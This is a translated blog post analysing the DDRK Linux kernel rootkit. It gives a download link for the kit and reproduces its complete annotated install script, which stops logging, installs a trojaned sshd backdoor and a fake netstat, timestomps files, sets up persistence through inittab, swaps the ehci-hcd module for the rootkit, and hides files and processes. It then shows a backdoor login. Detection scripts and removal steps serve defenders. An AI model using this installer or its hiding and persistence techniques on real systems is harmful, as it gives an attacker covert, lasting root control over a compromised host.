
Rootkits on Linux: the DDRK attack, root access, and how to remove it

Posted by 火星人 @ 2014-03-09, replies: 0

DDRK is a kernel-level Linux rootkit that combines the strengths of shv and adore-ng: shv's trojaned sshd and netstat for the backdoor, adore-ng's kernel module and control tool for hiding files and processes.

Files contained in DDRK:

netstat      # replaces the system netstat; reads the backdoor port from the sshd configuration file and hides it
rk.ko        # kernel module; provides the file and process hiding
setup        # rootkit installation script
tty          # the ava tool (adore-ng's user-space control program, renamed)
bin.tgz
---ttymon
---sshd.tgz
---.sh
---shdcf2    # sshd configuration file
---shhk
---shhk.pub
---shrs
---sshd      # the sshd main program (the backdoor listener)

setup unpacks bin.tgz into bin/ and sshd.tgz inside it into the hidden directory .sh/, which also carries a .bashrc for the backdoor's home directory. shhk, shhk.pub and shrs are evidently the host key, its public half and the random seed file for the trojaned sshd.

DDRK download: http://www.sectop.com/soft/ddrk.tgz

Once these files are uploaded to a server and setup runs successfully, the attacker has a hidden root shell on that machine and can do anything with it. Note what this does and does not mean: setup checks for root and exits if it is not already running as root, so DDRK is not a privilege-escalation tool. It is what an attacker installs after root has been obtained some other way, to keep that access and hide it.

The contents of setup (the original annotations are translated into shell comments, and a few more are added where a line is not self-explanatory):

#!/bin/bash

##########define variables##########
DEFPASS=123456            # default backdoor password
DEFPORT=43958             # default backdoor sshd port
BASEDIR=`pwd`
SSHDIR=/lib/libsh.so      # a directory named like a library: holds the sshd config and host keys
HOMEDIR=/usr/lib/libsh    # home directory for backdoor logins
# keep the install out of the shell history
unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

##########check is root##########
# no privilege escalation here: the installer refuses to run unless it is already root
if [ "$(whoami)" != "root" ]; then
    echo "BECOME ROOT AND TRY AGAIN"
    echo ""
    exit
fi

##########extract all tar##########
tar zxf bin.tgz
cd bin
tar zxf sshd.tgz
rm -rf ./sshd.tgz
cd $BASEDIR
rm -rf bin.tgz
cd $BASEDIR

##########kill syslogd##########
# stop the syslog daemon so nothing below is logged; it is restarted at the very end
killall -9 syslogd >/dev/null 2>&1
sleep 2

##########remove sh.conf##########
# /etc/sh.conf stores the backdoor password as the raw output of md5sum
# (an unsalted hash, not encryption); a stale copy from an earlier install is removed first
if [ -f /etc/sh.conf ]; then
    rm -rf /etc/sh.conf
fi

##########initialize sshd configuration##########
if test -n "$1" ; then
    echo "Using Password : $1"
    cd $BASEDIR/bin
    echo -n $1|md5sum > /etc/sh.conf
else
    echo "No Password Specified, using default - $DEFPASS"
    echo -n $DEFPASS|md5sum > /etc/sh.conf
fi
# timestomping: copy /bin/ls's access and modification times onto the new file;
# every file dropped below gets the same treatment, so they all carry /bin/ls's date
touch -acmr /bin/ls /etc/sh.conf
chown -f root:root /etc/sh.conf
# the backdoor sshd config (shdcf) is "Port N" followed by the shipped shdcf2 template
if test -n "$2" ; then
    echo "Using ssh-port : $2"
    echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config
    cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
    mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
else
    echo "No ssh-port Specified, using default - $DEFPORT"
    echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config
    cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
    mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
fi

###########creating dirs##########
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
if [ -d /lib/libsh.so ]; then
    rm -rf /lib/libsh.so
fi
if [ -d /usr/lib/libsh ]; then
    rm -rf /usr/lib/libsh/*
fi
mkdir $SSHDIR
touch -acmr /bin/ls $SSHDIR
mkdir $HOMEDIR
touch -acmr /bin/ls $HOMEDIR
cd $BASEDIR/bin
mv .sh/* $SSHDIR/
mv .sh/.bashrc $HOMEDIR
# remove any previous install (chattr first, in case the old binary was made immutable)
if [ -f /sbin/ttyload ]; then
    chattr -AacdisSu /sbin/ttyload
    rm -rf /sbin/ttyload
fi
if [ -f /usr/sbin/ttyload ]; then
    rm -rf /usr/sbin/ttyload
fi
if [ -f /sbin/ttymon ]; then
    rm -rf /sbin/ttymon
fi
# the trojaned sshd is installed as /sbin/ttyload; ttymon is the second daemon from bin.tgz
mv $SSHDIR/sshd /sbin/ttyload
chmod a+xr /sbin/ttyload
chmod o-w /sbin/ttyload
touch -acmr /bin/ls /sbin/ttyload
kill -9 `pidof ttyload` >/dev/null 2>&1
mv $BASEDIR/bin/ttymon /sbin/ttymon
chmod a+xr /sbin/ttymon
touch -acmr /bin/ls /sbin/ttymon
kill -9 `pidof ttymon` >/dev/null 2>&1
cp /bin/bash $SSHDIR

##########modify inittab##########
# persistence: insert "0:2345:once:/usr/sbin/ttyload" in front of the first getty entry
cp /etc/inittab /etc/.inittab
sed -e 's@^1:2345@0:2345:once:/usr/sbin/ttyload\n&@' /etc/inittab > /etc/.inittab
touch -acmr /etc/inittab /etc/.inittab
mv -f /etc/.inittab /etc/inittab
# /usr/sbin/ttyload is a four-line wrapper that starts both daemons and hides their PIDs;
# the backticks are escaped so that pidof runs at boot time, not now
echo "/sbin/ttyload -q > /dev/null 2>&1" > /usr/sbin/ttyload
echo "/sbin/ttymon > /dev/null 2>&1" >> /usr/sbin/ttyload
echo "${HOMEDIR}/tty i \`pidof ttyload\` > /dev/null 2>&1" >> /usr/sbin/ttyload
echo "${HOMEDIR}/tty i \`pidof ttymon\` > /dev/null 2>&1" >> /usr/sbin/ttyload
touch -acmr /bin/ls /usr/sbin/ttyload
chmod 755 /usr/sbin/ttyload
/usr/sbin/ttyload > /dev/null 2>&1
touch -amcr /bin/ls /etc/inittab

###########make sure inittab has modified##########
if [ ! "`grep ttyload /etc/inittab`" ]; then
    echo "# WARNING - SSHD WONT BE RELOADED UPON RESTART "
    echo "# inittab shuffling probly fucked-up ! "
fi

##########load rk.ko##########
# the genuine USB 2.0 host-controller module is unloaded and its file overwritten with rk.ko,
# so every later "modprobe ehci-hcd" (including the boot script written below) loads the rootkit
cd $BASEDIR
modprobe -r ehci-hcd
mv -f rk.ko /lib/modules/`uname -r`/kernel/drivers/usb/host/ehci-hcd.ko
modprobe ehci-hcd
mv tty $HOMEDIR

##########replace netstat##########
# the trojaned netstat gets the real one's timestamps before it takes its place
touch -acmr /bin/netstat netstat
mv -f netstat /bin/netstat

##########hide all files and process##########
# tty is adore-ng's control tool: "h" hides a path, "i" hides a PID
$HOMEDIR/tty h /etc/sh.conf > /dev/null 2>&1
$HOMEDIR/tty h /lib/libsh.so > /dev/null 2>&1
$HOMEDIR/tty h /usr/lib/libsh > /dev/null 2>&1
$HOMEDIR/tty h /sbin/ttyload > /dev/null 2>&1
$HOMEDIR/tty h /usr/sbin/ttyload > /dev/null 2>&1
$HOMEDIR/tty h /sbin/ttymon > /dev/null 2>&1
$HOMEDIR/tty i `pidof ttyload` > /dev/null 2>&1
$HOMEDIR/tty i `pidof ttymon` > /dev/null 2>&1

##########load rk.ko on boot##########
# scripts in /etc/sysconfig/modules/ are run by rc.sysinit on Red Hat-style systems
cat > /etc/sysconfig/modules/ehci.modules << EOF
#!/bin/sh
#install usb modules support
modprobe -r ehci-hcd
modprobe ehci-hcd
EOF
touch -amcr /bin/ls /etc/sysconfig/modules/ehci.modules
chmod 755 /etc/sysconfig/modules/ehci.modules
$HOMEDIR/tty h /etc/sysconfig/modules/ehci.modules > /dev/null 2>&1

##########check iptables setting##########
# show the first INPUT rules so the operator can see whether the backdoor port is reachable
if [ -f /sbin/iptables ]; then
    echo "`/sbin/iptables -L INPUT | head -5`"
else
    echo ""
    echo "# lucky for u no iptables found"
fi

##########start syslogd##########
/sbin/syslogd -m 0

Running it with password 123 and port 3333:

# ./setup 123 3333
Using Password : 123
Using ssh-port : 3333
Chain INPUT (policy ACCEPT)
target     prot opt source               destination

The last two lines are the iptables check: an empty INPUT chain with policy ACCEPT, so port 3333 is reachable from outside.

Checking the hiding:

Processes:

# ps -ef | egrep -i "ttyload|ttymon"
root 24761 17990 0 13:29 pts/2 00:00:00 egrep -i ttyload|ttymon

Only the egrep itself appears. The ttyload and ttymon processes hidden with "tty i" no longer show up in /proc, and therefore not in ps either.

Listening ports:

# netstat -ntplu
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:2208          0.0.0.0:*               LISTEN      2117/hpiod
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      2267/mysqld
tcp        0      0 0.0.0.0:43958           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      2134/cupsd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      2295/sendmail: acce
tcp        0      0 127.0.0.1:2207          0.0.0.0:*               LISTEN      2122/python
udp        0      0 0.0.0.0:32768           0.0.0.0:*                           2417/avahi-daemon:
udp        0      0 0.0.0.0:68              0.0.0.0:*                           19752/dhclient
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           2417/avahi-daemon:
udp        0      0 0.0.0.0:631             0.0.0.0:*                           2134/cupsd

Port 3333, configured in this run, is absent: the replaced netstat reads the port from shdcf and drops it from its output. A listener on the default port 43958 does still appear (most likely left over from an earlier run with the defaults, which the new shdcf no longer names), but with "-" in place of PID/Program name, because netstat fills that column from /proc/<pid> and the owning process is hidden.
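Because the port is hidden by a replaced /bin/netstat rather than by the kernel, reading the socket table straight from /proc/net/tcp sidesteps the trick. The script below is an added example written for this edit, not code from the original post or from DDRK: it decodes /proc/net/tcp, lists the listening sockets, and reports any port the installed netstat omits. The /proc/net/tcp rows and netstat output fed to it in the usage are constructed samples, not captures from the host on this page.

```shell
#!/bin/sh
# Added example, not code from the original post or from DDRK: read the TCP
# listener list straight from /proc/net/tcp and diff it against what the
# installed netstat reports. DDRK's netstat is a userland replacement that
# drops the port named in shdcf; the kernel's socket table in /proc is not
# touched, so a port present here and missing from netstat is a userland hide.
#
# /proc/net/tcp layout after the header line:
#   sl local_address rem_address st tx_queue:rx_queue tr:tm->when retrnsmt uid timeout inode ...
# local_address is HEXADDR:HEXPORT; the address is one little-endian 32-bit
# word, so 0100007F is 127.0.0.1. st 0A is TCP_LISTEN.

# hex_to_ip HEXADDR -> dotted quad
hex_to_ip() {
    h=$1
    b1=${h%??????}; r=${h#??}
    b2=${r%????};   r=${r#??}
    b3=${r%??};     b4=${r#??}
    printf '%d.%d.%d.%d' "0x$b4" "0x$b3" "0x$b2" "0x$b1"
}

# list_listeners [FILE] -> "ip port uid inode" per LISTEN socket, sorted by port.
# FILE defaults to the live /proc/net/tcp; a saved copy works for offline review.
list_listeners() {
    f=${1:-/proc/net/tcp}
    tail -n +2 "$f" | while read -r sl local rem st txrx trw retr uid timeout inode rest; do
        [ "$st" = "0A" ] || continue
        printf '%s %d %s %s\n' "$(hex_to_ip "${local%:*}")" "0x${local#*:}" "$uid" "$inode"
    done | sort -k2,2n
}

# netstat_ports FILE -> decimal LISTEN ports from saved `netstat -ntl` output
netstat_ports() {
    awk '$1 == "tcp" && $6 == "LISTEN" { n = split($4, a, ":"); print a[n] }' "$1"
}

# hidden_ports PROC_FILE NETSTAT_FILE -> ports the kernel says are listening
# but netstat does not show (one per line, empty when the two agree)
hidden_ports() {
    k=$(mktemp); s=$(mktemp)
    list_listeners "$1" | awk '{print $2}' | sort -u >"$k"
    netstat_ports "$2" | sort -u >"$s"
    comm -23 "$k" "$s"
    rm -f "$k" "$s"
}

# Live check (needs a Linux /proc and a netstat binary): DDRK_LIVE=1 sh this_file.sh
if [ "${DDRK_LIVE:-0}" = 1 ]; then
    n=$(mktemp); netstat -ntl >"$n" 2>/dev/null
    hidden_ports /proc/net/tcp "$n"
    rm -f "$n"
fi
```

On a DDRK host, hidden_ports prints the backdoor port (3333 for the run above) because the kernel still lists the socket while the trojaned netstat does not. Because the hidden process is also gone from /proc, the listener's owner cannot be resolved to a PID from userland; the inode number list_listeners prints is still useful for matching against /proc/*/fd from a rescue system or a clean kernel.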

Loaded modules:

# lsmod | grep -i ehci-hcd

Nothing comes back, but this proves less than it seems. lsmod prints module names with underscores (ehci_hcd), so this grep cannot match even an unhidden module, and a module is listed under the name it was built with, not the filename rk.ko was copied to. Grep for ehci_hcd instead, and compare `modinfo -F description` of the installed ehci-hcd.ko with what the genuine USB driver reports.

The rootkit's files:

# ls -dl /lib/libsh.so /usr/lib/libsh /etc/sh.conf /sbin/ttyload /sbin/ttymon /bin/ttymon /usr/sbin/ttyload
ls: /bin/ttymon: No such file or directory
-rw-r--r-- 1 2618748389 4063569279     36 Nov 28  2006 /etc/sh.conf
drwxr-xr-x 2 2618748389 4063569279   4096 May 11 13:28 /lib/libsh.so
-rwxr-xr-x 1 2618748389 4063569279 212747 Nov 28  2006 /sbin/ttyload
-rwxrwxr-x 1 2618748389 4063569279  93476 Nov 28  2006 /sbin/ttymon
drwxr-xr-x 2 2618748389 4063569279   4096 May 11 13:28 /usr/lib/libsh
-rwxr-xr-x 1 2618748389 4063569279    171 Nov 28  2006 /usr/sbin/ttyload

Three things in this listing are worth knowing. First, the files resolve by explicit path even though they are "hidden": adore-ng hides names from directory reads, not from stat, so `ls /etc | grep sh.conf` comes back empty while `ls -dl /etc/sh.conf` works. That asymmetry is itself a detection test. Second, the owner and group 2618748389/4063569279 are not accounts on the system; they are the magic ids adore-ng's "tty h" stamps on an inode to mark it hidden (ELITE_UID/ELITE_GID), so any file carrying them is an indicator. Third, the Nov 28 2006 dates are /bin/ls's, copied by `touch -acmr /bin/ls`; the two directories show the real install time (May 11 13:28) because setup moved files into them after copying the timestamps. The 36-byte sh.conf is exactly the output of md5sum: a 32-character hash, two spaces, "-" and a newline.

The /etc/inittab file:

# Run gettys in standard runlevels

0:2345:once:/usr/sbin/ttyload

1:2345:respawn:/sbin/mingetty tty1

2:2345:respawn:/sbin/mingetty tty2

3:2345:respawn:/sbin/mingetty tty3

4:2345:respawn:/sbin/mingetty tty4

5:2345:respawn:/sbin/mingetty tty5

6:2345:respawn:/sbin/mingetty tty6
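The checks just walked through (ps, netstat, lsmod, ls -dl, inittab) can be collected into one host scan. The following is an added example written for this edit, not code from the original post or from DDRK. It looks for the artifacts setup drops, using the paths, the inittab entry, the ehci-hcd.ko swap, the `touch -acmr /bin/ls` timestomping and the owner ids 2618748389/4063569279 shown above. It assumes that adore-ng hides names from directory reads but not from stat (which is why ls -dl still showed the files), that a genuine ehci-hcd.ko's modinfo description mentions "EHCI", and that md5("123456") is e10adc3949ba59abbe56e057f20f883e; the directory tree it is checked against is constructed, not a real system.

```shell
#!/bin/sh
# Added example, not code from the original post or from DDRK: a host check
# for the artifacts the setup script above leaves behind. The paths, the
# inittab entry, the ehci-hcd.ko swap, the "touch -acmr /bin/ls" timestomping
# and the owner ids 2618748389/4063569279 are all taken from this page.
# Assumptions: adore-ng hides names from directory reads but not from stat
# (which is why ls -dl above still showed the files); a genuine ehci-hcd.ko's
# modinfo description mentions "EHCI"; md5("123456") is
# e10adc3949ba59abbe56e057f20f883e (used only if md5sum is missing).
#
# Usage: ddrk_scan [ROOT]   ROOT is an optional prefix such as a mounted image
# (or a constructed tree, as in the test); default is the live system.
# Prints one "TAG detail" line per finding; returns 0 when clean, 1 otherwise.

DDRK_PATHS="/etc/sh.conf /lib/libsh.so /usr/lib/libsh /sbin/ttyload
/usr/sbin/ttyload /sbin/ttymon /etc/sysconfig/modules/ehci.modules"

# same_mtime A B: true when both exist and neither is newer than the other
same_mtime() {
    [ -e "$1" ] && [ -e "$2" ] && ! [ "$1" -nt "$2" ] && ! [ "$1" -ot "$2" ]
}

ddrk_scan() {
    root=${1:-}
    hits=0
    for p in $DDRK_PATHS; do
        [ -e "$root$p" ] || continue
        echo "FILE $p"; hits=$((hits + 1))
        # resolves by path but absent from the parent's listing: hidden by a live rk.ko
        if ! ls -a "$(dirname "$root$p")" | grep -qxF "$(basename "$p")"; then
            echo "HIDDEN_FROM_READDIR $p"; hits=$((hits + 1))
        fi
    done
    # setup copies /bin/ls's timestamps onto everything it drops, netstat included;
    # unrelated files sharing /bin/ls's exact mtime are the tell
    for p in $DDRK_PATHS /bin/netstat; do
        if same_mtime "$root$p" "$root/bin/ls"; then
            echo "TIMESTOMPED $p"; hits=$((hits + 1))
        fi
    done
    # "0:2345:once:/usr/sbin/ttyload" restarts the backdoor at boot
    if [ -f "$root/etc/inittab" ] && grep -q ttyload "$root/etc/inittab"; then
        echo "INITTAB $(grep ttyload "$root/etc/inittab" | head -n 1)"; hits=$((hits + 1))
    fi
    # sh.conf is `echo -n PASS | md5sum`, unsalted, so the default is recognisable
    if [ -f "$root/etc/sh.conf" ]; then
        def=$( { printf 123456 | md5sum 2>/dev/null || echo e10adc3949ba59abbe56e057f20f883e; } | cut -c1-32)
        if [ "$(cut -c1-32 "$root/etc/sh.conf")" = "$def" ]; then
            echo "DEFAULT_PASSWORD /etc/sh.conf is md5(123456)"; hits=$((hits + 1))
        fi
    fi
    # inodes stamped with adore-ng's magic owner, which is what "tty h" does
    tagged=$(find "$root/" -xdev \( -uid 2618748389 -o -gid 4063569279 \) -print 2>/dev/null || true)
    if [ -n "$tagged" ]; then
        echo "$tagged" | sed 's/^/ELITE_OWNER /'
        hits=$((hits + $(echo "$tagged" | wc -l)))
    fi
    # rk.ko is installed over the real USB host-controller module
    m="$root/lib/modules/$(uname -r)/kernel/drivers/usb/host/ehci-hcd.ko"
    if [ -f "$m" ] && command -v modinfo >/dev/null 2>&1; then
        case "$(modinfo -F description "$m" 2>/dev/null)" in
            *EHCI*) ;;
            *) echo "MODULE_REPLACED $m"; hits=$((hits + 1)) ;;
        esac
    fi
    [ "$hits" -eq 0 ]
}
```

Run it as `ddrk_scan` on the suspect host, or as `ddrk_scan /mnt/image` against a disk mounted from a clean system. The HIDDEN_FROM_READDIR and ELITE_OWNER checks only fire while rk.ko is loaded (the first) or on a filesystem whose inodes still carry the marker (the second); the path, timestamp, inittab and module checks work either way, which is why a mounted-image scan is the more reliable one.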

Verification:

The host on which setup was run successfully has IP 192.168.27.129.

From another machine, log in to 192.168.27.129 on port 3333 with the password 123:

[root@localhost ~]# ssh 192.168.27.129 -p 3333

root@192.168.27.129's password:

Last login: Thu Nov 11 11:20:59 2010 from 192.168.27.1

[sh] w.e.l.c.o.m.e

[sh] To The DoDo's Rootkit

[root@DoDo:/root]#

[root@DoDo:/root]# env

TERM=xterm

SHELL=/bin/bash

SSH_CLIENT=192.168.27.130 38824 3333

SSH_TTY=/dev/pts/3

USER=root

LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:

MAIL=/var/spool/mail/root

PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:/usr/local/sbin:/usr/lib/libs:.

PWD=/root

MACHINE=DoDo

PS1=\[\033[0;36m\][$ID@\[\033[1;37m\]$MACHINE\[\033[0m\]\[\033[0;36m\]:${PWD}]#\[\033[0m\]

SHLVL=1

HOME=/usr/lib/libsh

ID=root

LOGNAME=root

_=/bin/env

At this point 192.168.27.129 is completely under the attacker's control.

Logged-in users as seen on 192.168.27.129 itself:

# w
13:40:55 up 3:40, 0 users, load average: 1.23, 0.93, 0.77
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

Zero users: the backdoor session is not recorded, so only genuine local logins would ever appear here.

Removal:

# cd /usr/lib/libsh
# modprobe -r ehci-hcd
# ./tty u /etc/sysconfig/modules/ehci.modules
Checking for adore 0.12 or higher ...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# rm -rf /etc/sysconfig/modules/ehci.modules
# rm -rf /lib/modules/`uname -r`/kernel/drivers/usb/host/ehci-hcd.ko
# ./tty u /etc/sh.conf
# ./tty u /lib/libsh.so
# ./tty u /sbin/ttyload
# ./tty u /usr/sbin/ttyload
# ./tty u /sbin/ttymon
(each of these prints the same three "Adore NOT installed" lines as the first)
# rm -rf /etc/sh.conf /lib/libsh.so /usr/lib/libsh /sbin/ttyload /usr/sbin/ttyload /sbin/ttymon
# rm -rf /bin/netstat
# vim /etc/inittab    and delete the line
0:2345:once:/usr/sbin/ttyload

Note what the transcript shows: every `tty u` fails with "Adore NOT installed" because `modprobe -r ehci-hcd` had already unloaded rk.ko. That is harmless here; once the module is gone nothing is hidden any more, so the unhide calls are unnecessary and the files can simply be deleted. Three things the transcript leaves undone still need doing. The backdoor sshd (ttyload) and ttymon are still running in memory, and are visible to ps once the module is unloaded, so kill them (or reboot). /bin/netstat was deleted rather than restored, so reinstall it from the distribution's net-tools package. And the genuine ehci-hcd.ko was overwritten by setup, so the kernel's module package has to be reinstalled before USB 2.0 host support, and a clean `modprobe ehci-hcd`, work again. The .bashrc that setup placed in /usr/lib/libsh goes with that directory.

More importantly, find the hole the attacker came in through: setup refuses to run as anything but root, so root had already been obtained by some other route before DDRK was installed, and that route is what has to be closed. Given that a hostile kernel module has run on this host, rebuilding it from known-good media is the safer course.

This article is from the blog 「燕雀安知鴻鵠之志哉」; please keep this attribution: http://who0168.blog.51cto.com/253401/563660



http://coctec.com/docs/linux/show-post-48716.html